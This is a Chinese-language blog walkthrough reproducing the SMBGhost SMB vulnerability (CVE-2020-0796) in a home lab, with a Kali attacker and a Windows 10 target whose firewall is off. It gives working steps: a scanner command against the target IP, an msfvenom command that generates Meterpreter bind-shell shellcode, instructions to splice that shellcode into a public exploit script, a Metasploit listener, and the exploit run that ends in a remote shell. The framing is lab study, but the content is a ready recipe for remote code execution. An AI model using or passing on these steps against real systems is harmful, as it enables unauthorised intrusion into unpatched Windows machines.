永恒之黑CVE-2020-0796

1.永恒之黑漏洞复现需要准备三个东西,1个为kali攻击机,一个为win10靶机(关闭防火墙)

kali:192.168.15.128

win10:192.168.15.133

1.以下下是准备好的poc工具

永恒之黑CVE-2020-0796

 2.首先第一步我们对靶机进行漏洞检测,使用到的是SMBGhost这个工具进行漏洞检测,python3 scanner.py 192.168.15.133

cd进入目录后查看永恒之黑CVE-2020-0796

 检测出来存在该漏洞永恒之黑CVE-2020-0796

 3.下一步我们用msf生成一个编码为X00的shellcode,反向连接木马 msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

永恒之黑CVE-2020-0796

 4.打开POC文件将里面的exploit.py buf后面的代码进行修改

永恒之黑CVE-2020-0796

 

 永恒之黑CVE-2020-0796

 5.将exploit里面的内容进行替换,然后保存文件,在kali里面运行

永恒之黑CVE-2020-0796

永恒之黑CVE-2020-0796

永恒之黑CVE-2020-0796

 5.下一步我们进入msf,然后设置好ip和反弹连接端口,然后开启端口监听

永恒之黑CVE-2020-0796

 6.下一步我们用刚才的脚本进行攻击等待shell连接,python3 exploit -ip 192.168.15.133

永恒之黑CVE-2020-0796

 7.如果拿不到shell就多点几次,成功拿到shell!

永恒之黑CVE-2020-0796

上一篇:C++ STL算法系列6---copy函数


下一篇:C++拷贝构造函数